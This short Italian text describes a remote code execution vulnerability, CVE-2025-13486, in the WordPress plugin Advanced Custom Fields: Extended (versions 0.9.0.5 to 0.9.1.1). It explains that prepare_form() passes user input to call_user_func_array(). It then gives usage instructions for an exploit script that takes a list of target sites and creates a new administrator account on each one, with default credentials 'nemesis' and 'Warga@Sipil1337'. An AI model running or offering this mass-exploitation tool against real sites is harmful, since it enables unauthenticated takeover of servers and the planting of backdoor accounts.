
Il plugin Advanced Custom Fields: Extended per WordPress è vulnerabile all'esecuzione di codice remoto nelle versioni da 0.9.0.5 a 0.9.1.1 tramite la funzione prepare_form().
Il plugin Advanced Custom Fields: Extended per WordPress è vulnerabile all'Esecuzione Remota di Codice nelle versioni 0.9.0.5 fino alla 0.9.1.1 tramite la funzione prepare_form(). Ciò è dovuto al fatto che la funzione accetta input dell'utente e poi lo passa a call_user_func_array(). Questo rende possibile per attaccanti non autenticati eseguire codice arbitrario sul server, che può essere sfruttato per iniettare backdoor o creare nuovi account utente amministrativi.
Esegui lo script dalla riga di comando:
python CVE-2025-13486.py -l list.txt --email [email protected] --user new_user --password new_password
options:
-u, --url URL Single target WordPress site URL
-l yourlist.txt
File containing list of domains/URLs
--email, --email EMAIL
Email to set
--user USERNAME
Username to create (default: nemesis)
--password PASSWORD
Password to set (default: Warga@Sipil1337)
-o output.txt
Output file to save successful results (default: success_results.txt)